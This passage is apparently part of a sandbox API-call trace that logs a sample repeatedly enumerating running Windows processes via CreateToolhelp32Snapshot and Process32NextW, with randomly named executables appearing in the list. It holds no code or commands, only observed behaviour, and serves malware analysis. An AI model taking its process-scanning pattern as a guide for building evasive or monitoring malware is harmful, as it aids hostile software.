th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.776] CloseHandle (hObject=0xc4) returned 1 [0110.776] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.780] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.787] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.795] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.796] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.797] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.798] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.799] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.803] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.805] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.806] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.807] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.819] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0110.831] CloseHandle (hObject=0xbc) returned 1 [0110.831] Sleep (dwMilliseconds=0x12c) [0111.131] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.136] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 